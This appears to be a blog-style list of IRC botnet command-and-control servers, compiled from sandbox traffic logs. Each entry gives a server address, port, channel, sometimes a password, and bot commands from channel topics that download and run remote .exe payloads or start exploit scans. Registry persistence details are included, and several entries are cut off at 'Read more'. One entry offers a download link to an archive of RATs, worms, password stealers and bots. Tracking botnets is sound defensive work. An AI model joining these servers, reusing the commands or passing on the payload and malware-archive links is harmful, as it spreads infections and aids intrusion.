Remote Host Port Number 70.39.71.240 51987 NICK {New}[USA-1244024-XP] USER 8408605 “” “lol” :8408605 JOIN ##Crysis Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + winlog = “%Temp%lsass.exe” so that lsass.exe runs every time Windows starts Memory Modifications * There was a new process created in the system: Process Name Process Filename MainRead more...
17mb exe files from diferent malwares
inside the rar u have diferent malwares like rats,worms,passwd stealers,bots;mass emailers etc Download: http://81878971.filesonthe.net
play.mygreatbar.com( bfbot hosted in China Tianjin Longchishenzhou-ltd)
play.mygreatbar.com: type A, class IN, addr 61.136.59.34 UDP Protocol Dest IP:61.136.59.34 Dest Port:1863 exe file here: http://91.217.162.104/m.exe infos about hosting: http://whois.domaintools.com/61.136.59.34
java.KUTLUFAMILY.COM(update)
Remote Host Port Number 178.211.56.102 80 66.90.103.116 80 178.211.56.105 81 PASS sexy Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105] Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104] NICK cqdrrkewtnvc USER gazulycxeqrd “” “qzr” :gazulycxeqrd JOIN #3 PONG :irc.dal.net NICK [N00_USA_XP_7237251]` USER SP2-891 * 0 :COMPUTERNAME Now talking in #3 Topic On: [ #3 ] [ .flushdns |.down -S |.update -SRead more...
oxxo.seremonymt2.com(botnet hosted in United Kingdom London Rapidswitch Ltd)
oxxo.seremonymt2.com:6667 Channels : #ox – #x1 – #x2 -#x3 -#x4 -#x5 -#x6 -#x7 Topic On: [ #ox 12] [ 13 .download http://www.brosmt2.com/hacked/x2.exe c:windowsx2.exe 1 ] Topic By: [ HackWolf ] Modes On: [ #ox ] [ +mntMu ] infos about hosting: http://whois.domaintools.com/95.154.227.177
sohbet.az(botnet hosted in Germany Hetzner Online Ag)
Remote Host Port Number 173.192.225.170 80 64.211.162.99 80 67.202.66.171 80 67.202.66.203 80 67.202.94.86 80 75.126.182.189 80 95.168.183.188 80 178.63.104.143 6667 NICK USA|51200 USER svkhl 0 0 :USA|51200 JOIN #Dos! USERHOST USA|51200 MODE USA|51200 -x+i PRIVMSG #Dos! :- shell – File opened: www.siber.gen.tr Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices * TheRead more...
dalga.co.cc(botnet hosted in United Kingdom London Idealhosting Managed Servers)
dalga.co.cc:6667 chanels:#xp,#spam,#infected,#x infos about hosting: http://whois.domaintools.com/95.154.237.228
213-229-99-144.static.as29550.net(botnet hosted in United Kingdom Canonical Range For Mk-48z)
Remote Host Port Number 174.37.200.82 80 216.178.38.224 80 216.178.39.11 80 64.211.162.88 80 66.220.146.11 80 213.229.99.144 1234 PASS xxx NICK NEW-[USA|00|P|21899] USER XP-0708 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|21899] -ix JOIN #!nn! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/213.229.99.144
irc.accesox.net (botnet hosted in France Paris Ovh Sas)
Remote Host Port Number 222.122.46.122 80 91.121.96.162 6667 91.121.96.162 7000 NICK n{USA|XP}671615 NICK {USA|XP}077961 USER 0779 “” “TsGh” :0779 USER 7334 “” “TsGh” :7334 JOIN ##bote## PRIVMSG ##bote## :[Update]: Updating to: http://www.lespel.co.kr/images/USB_Vlad.exe JOIN #Weed PRIVMSG #Weed : New PC Infected. MODE pLagUe{USA}32852 -ix MODE #Weed -ix NICK pLagUe{USA}32852 USER SkuZ * ok TeaM UniX b0atRead more...
aaaa.forexinvest4.com(botnet hosted in Russian Federation Vline Ltd)
aaaa.forexinvest4.com ip: 109.196.130.66 aaaa.forexinvest4.com ip: 109.196.130.50 aaaa.forexinvest4.com:6939 PASS laorosr Channel#dpi Channel#! NICK [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #! Topic is ‘.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0Read more...